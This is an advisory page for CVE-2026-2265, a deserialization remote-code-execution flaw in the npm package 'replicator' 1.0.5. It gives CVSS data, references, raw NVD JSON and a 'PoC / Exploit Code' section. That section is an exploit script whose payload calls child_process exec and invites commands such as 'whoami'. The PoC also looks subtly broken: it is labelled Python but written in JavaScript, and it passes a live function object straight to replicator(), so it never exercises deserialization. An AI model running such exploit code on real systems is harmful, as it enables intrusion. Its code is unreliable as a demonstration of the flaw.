CVE-2026-2265

Description

An unauthenticated remote code execution (RCE) vulnerability exists in applications that use the Replicator node package manager (npm) version 1.0.5 to deserialize untrusted user input and execute the resulting object.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Replicator <= 1.0.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-2265
// This demonstrates unsafe deserialization leading to RCE in the replicator package v1.0.5.

const replicator = require('replicator');

// Malicious payload simulating untrusted user input
// This payload attempts to execute arbitrary code via deserialization logic
const maliciousPayload = {
    "type": " malicious_object",
    "data": {
        "constructor": {
            "prototype": {
                "execCmd": function() {
                    const { exec } = require('child_process');
                    // Replace with actual command (e.g., 'whoami', 'calc.exe')
                    exec('echo Vulnerability Exploited', (error, stdout, stderr) => {
                        console.log(stdout);
                    });
                }
            }
        }
    },
    "trigger": "execCmd"
};

console.log("[*] Sending malicious payload to replicator...");

try {
    // The application deserializes the untrusted input using the vulnerable library
    const result = replicator(maliciousPayload);
    console.log("[+] Deserialization complete. Check for command execution.");
} catch (e) {
    console.error("[-] Error during deserialization:", e);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2265
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2265
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2265/
[4] VulDB https://vuldb.com/cve/CVE-2026-2265
[5] https://github.com/inikulin/replicator
[6] https://github.com/inikulin/replicator/pull/19
[7] https://morielharush.github.io/2026/03/31/cve-2026-2265-replicator-deserialization-of-untrusted-data/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2265", "sourceIdentifier": "[email protected]", "published": "2026-04-01T17:28:38.410", "lastModified": "2026-04-03T16:11:11.357", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote code execution (RCE) vulnerability exists in applications that use the Replicator node package manager (npm) version 1.0.5 to deserialize untrusted user input and execute the resulting object."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "references": [{"url": "https://github.com/inikulin/replicator", "source": "[email protected]"}, {"url": "https://github.com/inikulin/replicator/pull/19", "source": "[email protected]"}, {"url": "https://morielharush.github.io/2026/03/31/cve-2026-2265-replicator-deserialization-of-untrusted-data/", "source": "[email protected]"}]}}